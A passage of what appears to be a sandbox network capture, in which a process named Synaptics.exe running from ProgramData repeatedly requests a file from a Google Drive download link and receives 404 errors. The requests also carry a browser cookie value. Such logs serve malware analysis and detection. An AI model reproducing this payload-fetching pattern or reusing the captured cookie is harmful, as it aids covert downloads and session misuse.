2024-12-30 10:41:30 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:29 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-QfhASN7qdSHZMkEFf36phw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49782	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:30 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:30 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:30 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-8TEGWYKsQZoDrmNGetaSlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49783	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:30 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:31 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5gV-2YjMFbRndKtgZmIG0EXQStgdKlNke9xxdncz1wMRw3QN4ZS8K7VkOFXLzcDagwcykP-q0 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:30 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-iCPBtgndn7U-OcJzVPPjbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:31 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:31 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 61 5f 44 59 63 6c 65 6f 64 38 57 55 6d 79 45 6b 4c 43 4f 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="9a_DYcleod8WUmyEkLCO6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:31 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49785	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:30 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:30 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:30 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-A18yzGcvnt359KHp4SvhBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49784	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:30 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:31 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7qDkGj7h0A9pfgBCCJeCGqeE3DMtV2QJe6G31VnXaAocSuEsNEv7P8R0iqFqWCGHT0BwDV2Og Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:31 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-kE0e9hQIvXRv1cQfoXwvgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:31 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:31 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 31 4e 7a 69 41 30 4e 64 6f 72 75 6b 63 54 6a 56 76 69 55 54 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="D1NziA0NdorukcTjVviUTg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:41:31 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49792	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:31 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:31 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:31 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-vUGIHa9g18CqUAidqoUdFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49791	172.217.18.110	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:31 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:41:32 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:31 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-DktzRiII_X-Bb92JKdTPSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49794	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:31 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:32 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC77L_BdOl2OjnmTwDNK_tltpAthRyiWCemZkC6jaJsUMOqJ9Yd_Okw29nEOqXhMTIuI Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:31 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-UygpzELVuJL2-soZZuyeLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:32 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:41:32 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 5a 69 77 4d 74 43 41 78 4c 35 70 32 70 37 76 6e 6a 58 35 56 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="gZiwMtCAxL5p2p7vnjX5VA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:41:32 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49796	142.250.185.193	443	7492	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:41:31 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=ncAUFd_f3R7tCY6I1V-9aXcwl8f4-P-SAgcYbcwMd_-QGmuEeVlhmWHs5nFFFPpQ4w2CBEaCE9ULQX--FZ0eEWjHbFEpDOLuSiSQKO6G3jZtKfHDB31FIaUZSuK3EA7BCcat5QB8w1lDfwdypdYgazh3_rIg4Y5shLD1jiLHnEGi8rNNknQXSmtP
2024-12-30 10:41:32 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6Ba0h2oYwiaQcwZH0UNtR1tKqZuMO5XT19bQ94jTVZ7UUEA5EoYp41QRSb9qSZYbMMyv2zsws Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:41:32 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-g-Zg4pw1-Z0YGhJfj6xOKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:41:32 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:41:32 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 4b 44 33 44 49 53 4c 59 50 73 36 78 49 53 6a 47 74 6f 79 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="HKD3DISLYPs6xISjGtoy4g">*{margin:0;padding:0}html,code{font:15px/22px 